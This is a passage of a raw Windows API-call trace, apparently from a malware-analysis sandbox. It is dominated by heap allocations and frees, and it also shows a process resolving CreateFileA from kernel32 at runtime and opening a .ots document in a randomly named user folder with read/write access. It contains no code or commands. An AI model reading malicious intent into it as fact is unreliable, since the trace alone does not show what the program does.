[0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0177.526] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.528] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba390 [0177.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba390, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.529] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0177.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.529] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0177.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0177.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0177.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", cchWideChar=80, lpMultiByteStr=0x923b28, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpUsedDefaultChar=0x0) returned 80 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0177.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.531] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\b1y6nam2jhwq3mozolb.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0177.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=80, lpWideCharStr=0x8f9058, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots") returned 80 [0177.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0177.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) 